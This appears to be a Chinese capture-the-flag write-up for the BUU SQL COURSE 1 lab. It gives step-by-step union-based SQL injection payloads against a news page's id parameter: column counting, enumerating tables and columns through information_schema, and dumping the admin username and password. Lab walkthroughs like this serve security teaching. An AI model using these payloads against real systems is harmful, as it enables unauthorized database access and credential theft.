BUU SQL COURSE 1 sql注入

这里分析,存在两个分析点

登录界面和新闻界面

这里可以先试一下登陆界面是否存在sql注入,但是经过测试不存在,可以通过通用的sql注入语句测试,从而分析到主要点不在登录,那就可能是新闻页面的,我们在点击新闻的时候,这里后面的代码处理是直接在数据库中进行搜索呈现,可以看到存在?id的形式

这里是直接拼接id,有回显,通过sql语句进行拼接id,因此这里就可以构造payload,通过访问地址进行查询他的数据库信息,因此就可以进行接下来的操作

探测数据表的列数

复制代码
?id=1 order by 2

存在两列

复制代码
?id=1 order by 3

不存在三列

查询数据库核心信息

复制代码
?id=-1 union select database(),2 

查看数据库信息

数据库信息为news

查询数据库里的所有表名

复制代码
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

存在两个数据表,包含admin和contents

进行查询admin的属性后查询属性值

复制代码
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

查询账号密码

复制代码
?id=-1 union select username,password from admin

得到admin账号密码

最后登录获得flag

相关推荐
学逆向的4 小时前
C++纯虚函数
开发语言·c++·网络安全
火山上的企鹅4 小时前
Codex实战:APP远程升级服务搭建(三)后台管理页面(APK 上传、版本管理、多应用页签)
服务器·网络·数据库·oracle·qgc
阿狸猿5 小时前
论 NoSQL 数据库技术及其应用
数据库·nosql
FBI HackerHarry浩5 小时前
DataGrip2023.2.3默认保存的数据库和.sql文件在哪里?怎么修改默认路径?
数据库
袁小皮皮不皮5 小时前
3.HCIP OSPF补充知识(优化版)
服务器·网络·数据库·网络协议·智能路由器
运筹vivo@5 小时前
Python ContextVar 底层机制与内存模型拆解
前端·数据库·python
志栋智能6 小时前
超自动化巡检:知识沉淀与团队协作的新载体
大数据·运维·网络·数据库·人工智能·自动化
syt_biancheng6 小时前
Redis初识
数据库·redis·缓存
cmes_love6 小时前
股票逐笔level2历史行情下载十档订单薄五档tick分钟下载分享
数据库·区块链
仙俊红6 小时前
SQL 调优需要掌握的知识
数据库·sql